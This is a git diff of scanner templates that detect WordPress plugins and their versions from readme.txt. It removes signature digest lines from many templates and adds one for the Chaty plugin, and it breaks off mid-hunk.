b/http/technologies/wordpress/plugins/breadcrumb-navxt.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a004730450221009017a7afed4d073047c7aebdb2c04eff82e6e755501d94b1afa71129ad03bc80022007329ef664c9b3183354505ba7b8a7465ab322bc6ca274bfc37bf4a7d1657696:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/breeze.yaml b/http/technologies/wordpress/plugins/breeze.yaml index d659c76005..a70a58690c 100644 --- a/http/technologies/wordpress/plugins/breeze.yaml +++ b/http/technologies/wordpress/plugins/breeze.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a004730450221008680804645512ff17fb1d71ceca040e7b8824ba675082411a5541633f69fb00402204ba2e3144f1541f7d8d8e283cacbe13bbab11ed6034c7f6305c7ce36d2329c1e:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/broken-link-checker.yaml b/http/technologies/wordpress/plugins/broken-link-checker.yaml index ad34054cb4..f8691caf0a 100644 --- a/http/technologies/wordpress/plugins/broken-link-checker.yaml +++ b/http/technologies/wordpress/plugins/broken-link-checker.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 490a004630440220041c841fa64555bdbc1c89643473afb676b0a809e579d6ccecea43535f7340f10220275b88182336fa1471c61987fe490a01afa4d07c349cce99dcb3d0803addd447:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/chaty.yaml b/http/technologies/wordpress/plugins/chaty.yaml new file mode 100644 index 0000000000..0cd866179e --- /dev/null +++ b/http/technologies/wordpress/plugins/chaty.yaml @@ -0,0 +1,48 @@ +id: wordpress-chaty + +info: + name: Floating Chat Widget' Contact Chat Icons, Telegram Chat, Line Messenger, WeChat, Email, SMS, Call Button – Chaty Detection + author: ricardomaia + severity: info + reference: + - https://wordpress.org/plugins/chaty/ + metadata: + plugin_namespace: chaty + wpscan: https://wpscan.com/plugin/chaty + tags: tech,wordpress,wp-plugin,top-200 + +http: + - method: GET + path: + - "{{BaseURL}}/wp-content/plugins/chaty/readme.txt" + + payloads: + last_version: helpers/wordpress/plugins/chaty.txt + + extractors: + - type: regex + part: body + internal: true + name: internal_detected_version + group: 1 + regex: + - '(?i)Stable.tag:\s?([\w.]+)' + + - type: regex + part: body + name: detected_version + group: 1 + regex: + - '(?i)Stable.tag:\s?([\w.]+)' + + matchers-condition: or + matchers: + - type: dsl + name: "outdated_version" + dsl: + - compare_versions(internal_detected_version, concat("< ", last_version)) + + - type: regex + part: body + regex: + - '(?i)Stable.tag:\s?([\w.]+)' diff --git a/http/technologies/wordpress/plugins/child-theme-configurator.yaml b/http/technologies/wordpress/plugins/child-theme-configurator.yaml index 9ce36de011..b1d8479d13 100644 --- a/http/technologies/wordpress/plugins/child-theme-configurator.yaml +++ b/http/technologies/wordpress/plugins/child-theme-configurator.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4b0a0048304602210088b15741047608265b94052a660d0eb3b8550936c34e383b1fb5897bb34f523602210082d72638a988e7f89afad62220998a42f24f049a4396c1c106fe614affb4dbb5:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/classic-editor.yaml b/http/technologies/wordpress/plugins/classic-editor.yaml index 6fd25a1820..04e090313f 100644 --- a/http/technologies/wordpress/plugins/classic-editor.yaml +++ b/http/technologies/wordpress/plugins/classic-editor.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022100f78b03e6915e19340e34a1a9c86f1862dde9329a3deb226842cc5acbe2e3aabe022063872f478535cedababafb4ed2c2b5fcb0ef7a7fd2cf1a5e95bc34acd5f253db:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/classic-widgets.yaml b/http/technologies/wordpress/plugins/classic-widgets.yaml index e50e837f50..57e618924b 100644 --- a/http/technologies/wordpress/plugins/classic-widgets.yaml +++ b/http/technologies/wordpress/plugins/classic-widgets.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022100e9548a6ea0733c20702dfdafe79cc446f1dbd88df7437564f8a1aa253791bfea0220340c1527c5a11b7c270941f19cc704fbfac58a2001835257d89941b1edacad77:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/click-to-chat-for-whatsapp.yaml b/http/technologies/wordpress/plugins/click-to-chat-for-whatsapp.yaml index c3dfb8a589..571b3b20a3 100644 --- a/http/technologies/wordpress/plugins/click-to-chat-for-whatsapp.yaml +++ b/http/technologies/wordpress/plugins/click-to-chat-for-whatsapp.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022100fe0f2a501cd01fbd29e16751a93bd64022eafdc9fae2b59c1f29e5937f82180b022046800d084c63e04588e0ce0e7136bc50619c3f5e467864545770f04872a512e3:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/cmb2.yaml b/http/technologies/wordpress/plugins/cmb2.yaml index 51f40eaf99..4d562316b4 100644 --- a/http/technologies/wordpress/plugins/cmb2.yaml +++ b/http/technologies/wordpress/plugins/cmb2.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a004730450220694bc544a88da2b2fecb68f0e8a5cd28c032de588588833de4a5a2e830d4e1b202210091be2781e6b1a03b882be7a22a7e3ae55f51213667b60159d335ccce85e218de:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/coblocks.yaml b/http/technologies/wordpress/plugins/coblocks.yaml index d7c4ee66ad..dcea952545 100644 --- a/http/technologies/wordpress/plugins/coblocks.yaml +++ b/http/technologies/wordpress/plugins/coblocks.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022100b83d5f9bb7de4b90e030aa3cd4ffceb28be74dee65b24db29b8bc5ac2a4b67a6022053d18c5fc1ba2ca587a33b621907603cb80e1a10bc8a4fc744cd281b05e8c69d:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/code-snippets.yaml b/http/technologies/wordpress/plugins/code-snippets.yaml index f8dc7fb207..0ae2f18122 100644 --- a/http/technologies/wordpress/plugins/code-snippets.yaml +++ b/http/technologies/wordpress/plugins/code-snippets.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022077cdd2caeadf67bc68aafce986756c6bfd50db6b2ff5374b7d789ee0f4964bbd022100ec376af18037764d6d6496d31612564a9d0408b7f0c84c48fe851288f1bebebf:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/coming-soon.yaml b/http/technologies/wordpress/plugins/coming-soon.yaml index 032549891a..12f549d536 100644 --- a/http/technologies/wordpress/plugins/coming-soon.yaml +++ b/http/technologies/wordpress/plugins/coming-soon.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 490a004630440220384289cf52c3ea26b485f74e99490b805f64a4a23fb55f9e7701bf98e14d878502205ad5b70aeab8ed7cdf073c96cd336ce3109625b84c56cdf2dbde0b1aa1b46707:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/complianz-gdpr.yaml b/http/technologies/wordpress/plugins/complianz-gdpr.yaml index 70eb71510f..d8ea6a72f1 100644 --- a/http/technologies/wordpress/plugins/complianz-gdpr.yaml +++ b/http/technologies/wordpress/plugins/complianz-gdpr.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4b0a00483046022100e82af05065a166759b5ee7f4f0ea85c1fb4f7112aea4fb3f8d8d28b3649b2cfd0221009bed13134b379db57804bfbb48726f05f5fb7f811a2238631db34d630f59ac09:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/contact-form-7-honeypot.yaml b/http/technologies/wordpress/plugins/contact-form-7-honeypot.yaml index a981f91be3..4afaf9dc97 100644 --- a/http/technologies/wordpress/plugins/contact-form-7-honeypot.yaml +++ b/http/technologies/wordpress/plugins/contact-form-7-honeypot.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022100af4f80223048e10d866ca1c1a15cdcdf8b2ecb21d28b4efa808704483b8089ac02203e666be67212b3bd922895e6b5487b9efb6d96018efd143b166d45dd6a8a0551:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/contact-form-7.yaml b/http/technologies/wordpress/plugins/contact-form-7.yaml index f3a855ad28..88fea67f93 100644 --- a/http/technologies/wordpress/plugins/contact-form-7.yaml +++ b/http/technologies/wordpress/plugins/contact-form-7.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 490a00463044022044587b35392120ae5526d928bc2eb651e28d546718a41e02122677a7590ba8de022071994f79b96eb3f51b9aa0538ef6349083d1b05eb517741fe789dd05cf9e9c08:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/contact-form-cfdb7.yaml b/http/technologies/wordpress/plugins/contact-form-cfdb7.yaml index 66dfb30a61..d205cdbf36 100644 --- a/http/technologies/wordpress/plugins/contact-form-cfdb7.yaml +++ b/http/technologies/wordpress/plugins/contact-form-cfdb7.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022100e2d93f904d739efa400787c004316d1440335a7091ca720846818bca543f2af2022077e25a6bd7bb4a0a1d5ce60b2f2d39c1895b2f5490013321c07cb95d760f6dbb:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/cookie-law-info.yaml b/http/technologies/wordpress/plugins/cookie-law-info.yaml index 84eb941f9a..3fa20df7d2 100644 --- a/http/technologies/wordpress/plugins/cookie-law-info.yaml +++ b/http/technologies/wordpress/plugins/cookie-law-info.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4b0a00483046022100db6fcd94ca32e2cf9fbe62ffadd6a3a25c25a756b26b9d22e1a9a63a1e4db626022100af5d1349d7b3196fc453ff59021956e8e50331bd54387cb08c5c9f83c2868d52:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/cookie-notice.yaml b/http/technologies/wordpress/plugins/cookie-notice.yaml index 9e60768043..bcd63ced86 100644 --- a/http/technologies/wordpress/plugins/cookie-notice.yaml +++ b/http/technologies/wordpress/plugins/cookie-notice.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022100a2be1d3af5a06714b4a5c86852293bdc7f5058fe8a549d3703e58364520f6d1402201804e9f050dfdf3ebc30fa02f93e126548f49701c3ab58b73ccb032ab449805b:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/copy-delete-posts.yaml b/http/technologies/wordpress/plugins/copy-delete-posts.yaml index 930a42e0f4..bca0326f2b 100644 --- a/http/technologies/wordpress/plugins/copy-delete-posts.yaml +++ b/http/technologies/wordpress/plugins/copy-delete-posts.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022100d5639eca9e26f19533b9c9589fb9239e347df2d49ec1e5d5e7c937ae743a0f7d0220481c788ec4e7efc3b18e6fef9f862e566fed7c1a05bc22a442c2769de9644ed9:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/creame-whatsapp-me.yaml b/http/technologies/wordpress/plugins/creame-whatsapp-me.yaml index f7e4496864..854328f04b 100644 --- a/http/technologies/wordpress/plugins/creame-whatsapp-me.yaml +++ b/http/technologies/wordpress/plugins/creame-whatsapp-me.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022100d3c53f90a87ae09604cd7418dfbfe0133a8e74fc8dd26c38e86793330c61bc2402206ee3c1aa22118237f78e7b252a3f7f28aba5ef8f7fcad90fbf74baa5bb8a291c:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/creative-mail-by-constant-contact.yaml b/http/technologies/wordpress/plugins/creative-mail-by-constant-contact.yaml index e9d2841f1f..6d3f7f4566 100644 --- a/http/technologies/wordpress/plugins/creative-mail-by-constant-contact.yaml +++ b/http/technologies/wordpress/plugins/creative-mail-by-constant-contact.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 490a0046304402204a0a8280cb2c87559f340998530c430c00f74f1d91119ff1a946ef209aefe3c5022056c225d3e6c985b9b839eded1a6e306aca5c0f03e853c8c86e05a27fd7db46c2:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/custom-css-js.yaml b/http/technologies/wordpress/plugins/custom-css-js.yaml index 73f7412719..a923d21a15 100644 --- a/http/technologies/wordpress/plugins/custom-css-js.yaml +++ b/http/technologies/wordpress/plugins/custom-css-js.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4b0a0048304602210087350830926947ab2df20caf8e71f388cb22dc055778d1a8b69c924af1ea3a65022100d5eebb0f68c41959d2358fcb2fe763cae7786cd0913744d706a0b4e095ab13dc:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/custom-fonts.yaml b/http/technologies/wordpress/plugins/custom-fonts.yaml index 249670ee41..f10480fc8f 100644 --- a/http/technologies/wordpress/plugins/custom-fonts.yaml +++ b/http/technologies/wordpress/plugins/custom-fonts.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4b0a00483046022100914765f0863f614c81cbf34fbe87e0a7553535485e22c833dc26e653b1f32c470221009f5b448bd0b819633760f19fe6b5932f6a9b9728f83132aaa3176809997113a5:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/custom-post-type-ui.yaml b/http/technologies/wordpress/plugins/custom-post-type-ui.yaml index c50fb8eecf..6c92091767 100644 --- a/http/technologies/wordpress/plugins/custom-post-type-ui.yaml +++ b/http/technologies/wordpress/plugins/custom-post-type-ui.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022034b8a0513b4f5f13f92a4b8ff2664c6ea7d9002e0a9bebe0224d2234815b804a022100cc9b9cc7e5a18c1938b887bf79f2718832c0257dc3271ed6e06daffcad0a9b09:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/disable-comments.yaml b/http/technologies/wordpress/plugins/disable-comments.yaml index 65a1b01d7a..b25c6c9a9c 100644 --- a/http/technologies/wordpress/plugins/disable-comments.yaml +++ b/http/technologies/wordpress/plugins/disable-comments.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022100a2920b05b3520edb1b37904cf8ff21d0eb26cc493baa6f08ded205ed884ab71c022031d6b7f62af315a1dbd8ba05eff7173614df690bf1f4c1b9284eae014e09f91f:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/disable-gutenberg.yaml b/http/technologies/wordpress/plugins/disable-gutenberg.yaml index 750c5b38b6..1781172d05 100644 --- a/http/technologies/wordpress/plugins/disable-gutenberg.yaml +++ b/http/technologies/wordpress/plugins/disable-gutenberg.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022100ccca188f28f7547f59bcbb6709a7064329f5e6720b1f54a42e98a968c0369ed602206c8b34df68e337207c1b792ab58c9810dcb7bcaa1a122bd51913516526261a4e:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/duplicate-page.yaml b/http/technologies/wordpress/plugins/duplicate-page.yaml index 99c90a57e9..92c8ce3409 100644 --- a/http/technologies/wordpress/plugins/duplicate-page.yaml +++ b/http/technologies/wordpress/plugins/duplicate-page.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022100e77ec1ae282b6ccb8d99335332e10197d9efdc98f87bc9a9387cd02a043cbec902207d2a123c70488452512cedb6e68df4cf0abc88bec3e08428a59396a2e8c2fcf0:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/duplicate-post.yaml b/http/technologies/wordpress/plugins/duplicate-post.yaml index 85ea0c6d6d..eea42ed8da 100644 --- a/http/technologies/wordpress/plugins/duplicate-post.yaml +++ b/http/technologies/wordpress/plugins/duplicate-post.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a0047304502205f825d2337e150b91dbf835953e252d7e983628a163bc178532df272bac4cfa2022100e8a67980ed306f1eeffa5dbf23b02192fd8d944b79aca39f19e68688dbb96fde:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/duplicator.yaml b/http/technologies/wordpress/plugins/duplicator.yaml index a5df60b082..bedb85a0eb 100644 --- a/http/technologies/wordpress/plugins/duplicator.yaml +++ b/http/technologies/wordpress/plugins/duplicator.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a0047304502207e6f611c905baab9d5c3bdece3a3766a842170d0ecddacd43cb133b28b06778c02210092117231b8b6251efc9aa3fb39ded668660293bfba7b3b55604d17f2107889bb:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/duracelltomi-google-tag-manager.yaml b/http/technologies/wordpress/plugins/duracelltomi-google-tag-manager.yaml index 5261d975b2..45bbbc71df 100644 --- a/http/technologies/wordpress/plugins/duracelltomi-google-tag-manager.yaml +++ b/http/technologies/wordpress/plugins/duracelltomi-google-tag-manager.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4b0a00483046022100e33a30d5d713df387a3638a15078bf5977719cab06cfbd804ad0347b301a0edd022100da54f7e3e4945e0212a6ee3d8231d8dde9a12dca36f890f2331a4cc14ba0b3f0:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/easy-table-of-contents.yaml b/http/technologies/wordpress/plugins/easy-table-of-contents.yaml index 10e7c3f77d..03befac73e 100644 --- a/http/technologies/wordpress/plugins/easy-table-of-contents.yaml +++ b/http/technologies/wordpress/plugins/easy-table-of-contents.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a004730450221009909b80636245767dee363602aaf7fe231a627372a7b259266e7dc5ffe274703022075eae008976fb86ae2a8253f854ca4b0d7e623f4cd9cf9971bf518d418320a14:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/easy-wp-smtp.yaml b/http/technologies/wordpress/plugins/easy-wp-smtp.yaml index e98c0e7dbf..e1f0093127 100644 --- a/http/technologies/wordpress/plugins/easy-wp-smtp.yaml +++ b/http/technologies/wordpress/plugins/easy-wp-smtp.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4b0a00483046022100834724bbf0c3d2011f2507eba2afb31375cad5d652b429ff1687125ce516a84f0221008b64f9144b48e97099179323be29b92723aed4cff2fa0a04a40a50ea2a89a30c:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/elementor.yaml b/http/technologies/wordpress/plugins/elementor.yaml index ab73175154..0db316d66d 100644 --- a/http/technologies/wordpress/plugins/elementor.yaml +++ b/http/technologies/wordpress/plugins/elementor.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022100e19d629ad95f4eac4db2e5512cd2ba73389b27a9f9766466a63e9828770d481e02206e99e4334555340bbc13ba46db89ae915a8d9fe689d67aa2630b31bed98ff60f:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/elementskit-lite.yaml b/http/technologies/wordpress/plugins/elementskit-lite.yaml index ef0a5c9cc4..135639253d 100644 --- a/http/technologies/wordpress/plugins/elementskit-lite.yaml +++ b/http/technologies/wordpress/plugins/elementskit-lite.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a0047304502210090ac5bf006c13b6bb67e013c776b2190b203604432a32de7899a660d190b001f02204c3110a23d345316495ab05ee3b07303305dae140c8ca1cc0015957c7bfb247d:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/enable-media-replace.yaml b/http/technologies/wordpress/plugins/enable-media-replace.yaml index 4adc97c884..540fbaf9ac 100644 --- a/http/technologies/wordpress/plugins/enable-media-replace.yaml +++ b/http/technologies/wordpress/plugins/enable-media-replace.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022100b1153a764995dac4233040edf6cfc407287415addb3c7ffa8ba983caf2a363bb02204d48f3d2283de014bec29897e6fed71201ba4320958ee52dd6789e71f727d8fc:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/envato-elements.yaml b/http/technologies/wordpress/plugins/envato-elements.yaml index a75b113362..7e71b4736f 100644 --- a/http/technologies/wordpress/plugins/envato-elements.yaml +++ b/http/technologies/wordpress/plugins/envato-elements.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022053d4e9d9cfac796df23ba2042cf0dfb5dd167bfc6f6423ad6c8c0e071f6f18170221008a790bb45e907e94a949f6cc2241091388e8aa9c70338ce7ddeb6433f32d0566:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/essential-addons-for-elementor-lite.yaml b/http/technologies/wordpress/plugins/essential-addons-for-elementor-lite.yaml index 0cf6da7545..88a70b2478 100644 --- a/http/technologies/wordpress/plugins/essential-addons-for-elementor-lite.yaml +++ b/http/technologies/wordpress/plugins/essential-addons-for-elementor-lite.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022100878c3a6cb2f29d4535ea6f78bd4b9582e01cabb3002317b13c9147cceb2728c302207c58fe19769ec05937e8c3e17ea435e176b714a1369d15bd6629927c5a5f73c5:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/ewww-image-optimizer.yaml b/http/technologies/wordpress/plugins/ewww-image-optimizer.yaml index ddc9689ef6..fc498e67e6 100644 --- a/http/technologies/wordpress/plugins/ewww-image-optimizer.yaml +++ b/http/technologies/wordpress/plugins/ewww-image-optimizer.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 490a0046304402202c22acfa80dfb52ebedacfe5b82fa56b77d0719b5b69a23a077ee4a23630436402201ed7b93a181a13d37a2af57dc99e6ed76ead27e1fc12ad8d1494580528dbd342:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/facebook-for-woocommerce.yaml b/http/technologies/wordpress/plugins/facebook-for-woocommerce.yaml index a5bf00f60a..465aa93d57 100644 --- a/http/technologies/wordpress/plugins/facebook-for-woocommerce.yaml +++ b/http/technologies/wordpress/plugins/facebook-for-woocommerce.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 490a00463044022025dfcf650f934b4a26f9e0f19b716eeab7c5b15d84cecbabde257033a9e990da0220372b432eb46f34ca1abb462c80c6aa8f531cdd191e99ea37541a2ebb3a0d683c:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/fast-indexing-api.yaml b/http/technologies/wordpress/plugins/fast-indexing-api.yaml index 62508df573..2a1b0e57a9 100644 --- a/http/technologies/wordpress/plugins/fast-indexing-api.yaml +++ b/http/technologies/wordpress/plugins/fast-indexing-api.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4b0a004830460221009183dc31a3baac866d1b3dc683df6c15c0d35d2391a1fba95cc4d83d7a1131d702210085cf5ed7aec736f9c6c4cf2d24f8329135fb60b7c8d3a4183d047405ca318da7:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/favicon-by-realfavicongenerator.yaml b/http/technologies/wordpress/plugins/favicon-by-realfavicongenerator.yaml index 8c87bbf565..df35e8b415 100644 --- a/http/technologies/wordpress/plugins/favicon-by-realfavicongenerator.yaml +++ b/http/technologies/wordpress/plugins/favicon-by-realfavicongenerator.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4b0a004830460221009df2cdd037d6bf14f02f47933ece136f508a262cc3309772730f3c83f9c8ac87022100a7b8e8ac540d86c34d478ee3eab7901be202f499a3c5656a56d3fc9004b83399:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/flamingo.yaml b/http/technologies/wordpress/plugins/flamingo.yaml index 3bc62ce326..033cc4bc3d 100644 --- a/http/technologies/wordpress/plugins/flamingo.yaml +++ b/http/technologies/wordpress/plugins/flamingo.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022028f9a1aa4a92cb9b9452cb4c9bd0218eac8ef23bc817068470d3c6cb77f40b6d022100dcd3bb6a42f784793bf066e3cf4ace3adc5777801e8a1bf99cd55b7b68749ec7:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/fluentform.yaml b/http/technologies/wordpress/plugins/fluentform.yaml index 536fe13411..945ab6ad03 100644 --- a/http/technologies/wordpress/plugins/fluentform.yaml +++ b/http/technologies/wordpress/plugins/fluentform.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 490a00463044022073759daaefca38354050098f404bd14bc7f58bafe8b49f0390ca268c5df7047702200c637ca7b3a4b361cc323c7fabfa9ec73d647954167eae899d6732b157d79743:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/font-awesome.yaml b/http/technologies/wordpress/plugins/font-awesome.yaml index 21bd2f4c51..2072b51ab9 100644 --- a/http/technologies/wordpress/plugins/font-awesome.yaml +++ b/http/technologies/wordpress/plugins/font-awesome.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4b0a0048304602210085d0c0f357f742c85260b85d24af882b99a58442a61ebe03d1ffcae5867a7d72022100bc64e28e7eb3a0b63affb71beeceae53bffc63e445c0f6137395d648b9f961cf:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/force-regenerate-thumbnails.yaml b/http/technologies/wordpress/plugins/force-regenerate-thumbnails.yaml index e4ad09a1de..b509d8cc67 100644 --- a/http/technologies/wordpress/plugins/force-regenerate-thumbnails.yaml +++ b/http/technologies/wordpress/plugins/force-regenerate-thumbnails.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a0047304502201925756022f3e7fe15fe5e37e27aa0413bc159321c13ec670124fffd749735f202210098d9807a92a11e3e1df078163a88531fd2f4e2f709642c8a621bccda00a70e40:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/formidable.yaml b/http/technologies/wordpress/plugins/formidable.yaml index 4062591665..c984479bde 100644 --- a/http/technologies/wordpress/plugins/formidable.yaml +++ b/http/technologies/wordpress/plugins/formidable.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 490a00463044022042deff8879164e191fc2e2164e1980b9aed0a9537da6665db819b342b6a7bf8802200e7de8820499b34eb056c9787170f2c9806a46d22b1773652bad43628ed684d3:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/forminator.yaml b/http/technologies/wordpress/plugins/forminator.yaml index d0b76ce08a..a3870175c7 100644 --- a/http/technologies/wordpress/plugins/forminator.yaml +++ b/http/technologies/wordpress/plugins/forminator.yaml @@ -46,4 +46,3 @@ http: part: body regex: - 